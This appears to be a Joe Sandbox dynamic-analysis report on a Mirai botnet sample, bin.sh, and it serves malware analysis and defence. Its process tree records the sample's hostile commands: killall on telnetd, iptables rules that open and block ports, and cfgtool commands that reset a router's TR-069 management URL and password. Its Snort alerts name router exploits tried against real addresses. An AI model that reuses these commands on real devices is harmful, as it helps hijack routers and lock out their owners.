Loading ...

Play interactive tourEdit tour

Linux Analysis Report bin.sh

Overview

General Information

Sample Name:bin.sh
Analysis ID:522924
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Sample tries to persist itself using System V runlevels
Opens /proc/net/* files useful for finding connected devices and routers
Sample tries to persist itself using /etc/profile
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Uses known network protocols on non-standard ports
Executes the "iptables" command to insert, remove and/or manipulate rules
Sample reads /proc/mounts (often used for finding a writable filesystem)
Terminates several processes with shell command 'killall'
Writes ELF files to disk
Yara signature match
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes HTML files containing JavaScript to disk
Sample has stripped symbol table
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "modprobe" command used for loading kernel modules
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:522924
Start date:16.11.2021
Start time:15:43:38
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 43s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:bin.sh
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.evad.linSH@0/221@4/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • Created / dropped Files have been reduced to 100
  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/522924/sample/bin.sh

Process Tree

  • system is lnxubuntu1
  • bin.sh (PID: 6777, Parent: 6712, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/bin.sh
    • bin.sh New Fork (PID: 6790, Parent: 6777)
      • bin.sh New Fork (PID: 6792, Parent: 6790)
        • bin.sh New Fork (PID: 6794, Parent: 6792)
        • sh (PID: 6794, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 6797, Parent: 6794)
          • killall (PID: 6797, Parent: 6794, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • bin.sh New Fork (PID: 6813, Parent: 6792)
        • bin.sh New Fork (PID: 6814, Parent: 6792)
        • bin.sh New Fork (PID: 6815, Parent: 6792)
          • bin.sh New Fork (PID: 6825, Parent: 6815)
          • sh (PID: 6825, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6827, Parent: 6825)
            • iptables (PID: 6827, Parent: 6825, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
              • iptables New Fork (PID: 6842, Parent: 6827)
              • modprobe (PID: 6842, Parent: 6827, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • bin.sh New Fork (PID: 6855, Parent: 6815)
          • sh (PID: 6855, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6857, Parent: 6855)
            • iptables (PID: 6857, Parent: 6855, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6858, Parent: 6815)
          • sh (PID: 6858, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6863, Parent: 6858)
            • iptables (PID: 6863, Parent: 6858, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6893, Parent: 6815)
          • sh (PID: 6893, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6897, Parent: 6893)
            • iptables (PID: 6897, Parent: 6893, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6904, Parent: 6815)
          • sh (PID: 6904, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 47453 -j ACCEPT"
            • sh New Fork (PID: 6913, Parent: 6904)
            • iptables (PID: 6913, Parent: 6904, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6932, Parent: 6815)
          • sh (PID: 6932, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT"
            • sh New Fork (PID: 6935, Parent: 6932)
            • iptables (PID: 6935, Parent: 6932, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6940, Parent: 6815)
          • sh (PID: 6940, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT"
            • sh New Fork (PID: 6948, Parent: 6940)
            • iptables (PID: 6948, Parent: 6940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6967, Parent: 6815)
          • sh (PID: 6967, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT"
            • sh New Fork (PID: 6973, Parent: 6967)
            • iptables (PID: 6973, Parent: 6967, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
        • bin.sh New Fork (PID: 6819, Parent: 6792)
        • bin.sh New Fork (PID: 6821, Parent: 6792)
        • bin.sh New Fork (PID: 6823, Parent: 6792)
        • bin.sh New Fork (PID: 6990, Parent: 6792)
        • sh (PID: 6990, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 6992, Parent: 6990)
          • iptables (PID: 6992, Parent: 6990, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • bin.sh New Fork (PID: 6993, Parent: 6792)
        • sh (PID: 6993, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 6995, Parent: 6993)
          • iptables (PID: 6995, Parent: 6993, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • bin.sh New Fork (PID: 6996, Parent: 6792)
        • sh (PID: 6996, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 6998, Parent: 6996)
          • iptables (PID: 6998, Parent: 6996, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • bin.sh New Fork (PID: 7002, Parent: 6792)
        • sh (PID: 7002, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 7010, Parent: 7002)
          • iptables (PID: 7010, Parent: 7002, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • bin.sh New Fork (PID: 7031, Parent: 6792)
        • sh (PID: 7031, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • bin.sh New Fork (PID: 7047, Parent: 6792)
        • sh (PID: 7047, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • bin.sh New Fork (PID: 7060, Parent: 6792)
        • sh (PID: 7060, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 7067, Parent: 7060)
          • iptables (PID: 7067, Parent: 7060, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • bin.sh New Fork (PID: 7087, Parent: 6792)
        • sh (PID: 7087, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 7093, Parent: 7087)
          • iptables (PID: 7093, Parent: 7087, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • bin.sh New Fork (PID: 7114, Parent: 6792)
        • sh (PID: 7114, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 7122, Parent: 7114)
          • iptables (PID: 7122, Parent: 7114, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • bin.sh New Fork (PID: 7140, Parent: 6792)
        • sh (PID: 7140, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 7145, Parent: 7140)
          • iptables (PID: 7145, Parent: 7140, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • bin.sh New Fork (PID: 7158, Parent: 6792)
        • sh (PID: 7158, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 7163, Parent: 7158)
          • iptables (PID: 7163, Parent: 7158, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • bin.sh New Fork (PID: 7171, Parent: 6792)
        • sh (PID: 7171, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 7179, Parent: 7171)
          • iptables (PID: 7179, Parent: 7171, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • bin.sh New Fork (PID: 7194, Parent: 6792)
        • sh (PID: 7194, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 7200, Parent: 7194)
          • iptables (PID: 7200, Parent: 7194, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • bin.sh New Fork (PID: 7209, Parent: 6792)
        • sh (PID: 7209, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 7216, Parent: 7209)
          • iptables (PID: 7216, Parent: 7209, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • bin.sh New Fork (PID: 7224, Parent: 6792)
        • sh (PID: 7224, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 7230, Parent: 7224)
          • iptables (PID: 7230, Parent: 7224, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • bin.sh New Fork (PID: 7241, Parent: 6792)
        • sh (PID: 7241, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 7248, Parent: 7241)
          • iptables (PID: 7248, Parent: 7241, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • bin.sh New Fork (PID: 7255, Parent: 6792)
        • sh (PID: 7255, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 7261, Parent: 7255)
          • iptables (PID: 7261, Parent: 7255, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • bin.sh New Fork (PID: 7280, Parent: 6792)
        • sh (PID: 7280, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 7290, Parent: 7280)
          • iptables (PID: 7290, Parent: 7280, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • bin.sh New Fork (PID: 7314, Parent: 6792)
        • sh (PID: 7314, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7316, Parent: 7314)
          • iptables (PID: 7316, Parent: 7314, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7317, Parent: 6792)
        • sh (PID: 7317, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7319, Parent: 7317)
          • iptables (PID: 7319, Parent: 7317, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7321, Parent: 6792)
        • sh (PID: 7321, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7327, Parent: 7321)
          • iptables (PID: 7327, Parent: 7321, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7344, Parent: 6792)
        • sh (PID: 7344, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7351, Parent: 7344)
          • iptables (PID: 7351, Parent: 7344, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7369, Parent: 6792)
        • sh (PID: 7369, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"
          • sh New Fork (PID: 7378, Parent: 7369)
          • iptables (PID: 7378, Parent: 7369, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7395, Parent: 6792)
        • sh (PID: 7395, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"
          • sh New Fork (PID: 7405, Parent: 7395)
          • iptables (PID: 7405, Parent: 7395, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7420, Parent: 6792)
        • sh (PID: 7420, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"
          • sh New Fork (PID: 7426, Parent: 7420)
          • iptables (PID: 7426, Parent: 7420, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7432, Parent: 6792)
        • sh (PID: 7432, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"
          • sh New Fork (PID: 7439, Parent: 7432)
          • iptables (PID: 7439, Parent: 7432, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
  • upstart New Fork (PID: 7470, Parent: 3310)
  • sh (PID: 7470, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 7471, Parent: 7470)
    • date (PID: 7471, Parent: 7470, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 7472, Parent: 7470)
    • apport-checkreports (PID: 7472, Parent: 7470, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 7497, Parent: 3310)
  • sh (PID: 7497, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 7498, Parent: 7497)
    • date (PID: 7498, Parent: 7497, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 7504, Parent: 7497)
    • apport-gtk (PID: 7504, Parent: 7497, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 7524, Parent: 3310)
  • sh (PID: 7524, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 7525, Parent: 7524)
    • date (PID: 7525, Parent: 7524, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 7526, Parent: 7524)
    • apport-gtk (PID: 7526, Parent: 7524, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
bin.shSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
bin.shJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    bin.shJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      bin.shJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        bin.shJoeSecurity_Mirai_4Yara detected MiraiJoe Security

          PCAP (Network Traffic)

          SourceRuleDescriptionAuthorStrings
          dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

            Dropped Files

            SourceRuleDescriptionAuthorStrings
            /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
            • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
            • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
            • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
            • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
            • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
            /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                /usr/networksJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                  /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

                    Memory Dumps

                    SourceRuleDescriptionAuthorStrings
                    6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                      6821.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                        6790.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
                          6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
                          • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
                          • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
                          • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
                          • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
                          • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
                          6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
                            Click to see the 12 entries

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection:

                            barindex
                            Antivirus / Scanner detection for submitted sampleShow sources
                            Source: bin.shAvira: detected
                            Multi AV Scanner detection for submitted fileShow sources
                            Source: bin.shMetadefender: Detection: 54%Perma Link
                            Source: bin.shReversingLabs: Detection: 75%
                            Antivirus detection for dropped fileShow sources
                            Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau

                            Spreading:

                            barindex
                            Opens /proc/net/* files useful for finding connected devices and routersShow sources
                            Source: /tmp/bin.sh (PID: 6815)Opens: /proc/net/route
                            Source: /tmp/bin.sh (PID: 6815)Opens: /proc/net/route

                            Networking:

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                            Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57282 -> 221.128.175.114:80
                            Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55784
                            Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55784
                            Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55824
                            Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55824
                            Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56102
                            Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56102
                            Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56382
                            Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56382
                            Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45982 -> 70.38.30.153:80
                            Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45982 -> 70.38.30.153:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33058 -> 104.103.72.220:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33058 -> 104.103.72.220:80
                            Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.103.72.220:80 -> 192.168.2.20:33058
                            Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60718 -> 3.113.149.148:80
                            Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:38508 -> 52.54.104.1:80
                            Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60718 -> 3.113.149.148:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:36526 -> 15.164.228.23:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:36526 -> 15.164.228.23:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51860 -> 66.180.167.13:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51860 -> 66.180.167.13:80
                            Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:33706 -> 104.69.40.99:80
                            Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:33706 -> 104.69.40.99:80
                            Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.69.40.99:80 -> 192.168.2.20:33706
                            Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:38172 -> 122.201.116.141:80
                            Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:38172 -> 122.201.116.141:80
                            Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 201.49.41.72:80
                            Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 201.49.41.72:80
                            Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36730 -> 216.180.103.7:80
                            Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36730 -> 216.180.103.7:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40506 -> 139.59.180.200:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40506 -> 139.59.180.200:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45410 -> 45.204.39.235:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45410 -> 45.204.39.235:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53170 -> 154.208.92.84:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53170 -> 154.208.92.84:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47632 -> 13.112.197.38:80
                            Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47632 -> 13.112.197.38:80
                            Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43200 -> 175.119.69.229:80
                            Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:35942 -> 91.195.35.202:8080
